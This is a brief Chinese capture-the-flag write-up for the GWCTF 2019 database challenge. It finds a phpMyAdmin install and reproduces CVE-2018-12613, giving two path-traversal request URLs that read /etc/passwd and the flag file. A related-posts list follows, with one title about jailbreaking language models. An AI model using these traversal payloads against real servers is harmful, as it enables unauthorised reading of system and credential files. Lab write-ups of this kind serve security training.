[GWCTF 2019]我有一个数据库

过来毛都没有

直接dirsearch 扫一下

发现存在 phpadmin 我们直接访问一下

啥都没有 但是给我们了 phpadmin的版本

我们去搜搜看是否存在漏洞

phpMyAdmin 4.8.1后台文件包含漏洞(CVE-2018-12613)_phpmyadmin cve-2018-12613漏洞获取webshell_zhang三的博客-CSDN博客

发现还真有 我们直接复现即可

复制代码
/phpmyadmin/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd
复制代码
phpmyadmin/index.php?target=db_sql.php%253f/../../../../../../../../flag
相关推荐
fmingzh8 分钟前
NVIDIA高级辅助驾驶安全与技术读后感
人工智能·安全·自动驾驶
Blossom.1181 小时前
量子网络:构建未来通信的超高速“高速公路”
网络·opencv·算法·安全·机器学习·密码学·量子计算
落——枫1 小时前
网络安全知识点3
安全·web安全
柴郡猫^O^2 小时前
OSCP - Proving Grounds - Wpwn
安全·网络安全·安全性测试
安全系统学习2 小时前
网络安全之红队LLM的大模型自动化越狱
运维·人工智能·安全·web安全·机器学习·php
JohnYan5 小时前
工作笔记 - ASN.1密钥结构和编码研究
javascript·后端·安全
用户3521802454756 小时前
Burp Suite-使用本地文件作为响应内容
安全·逆向
G扇子6 小时前
深入解析XSS攻击:从原理到防御的全方位指南
前端·安全
w23617346017 小时前
HTTP vs HTTPS:传输协议的安全演进与核心差异
安全·http·https
kaamelai7 小时前
Kaamel视角下的MCP安全最佳实践
大数据·人工智能·安全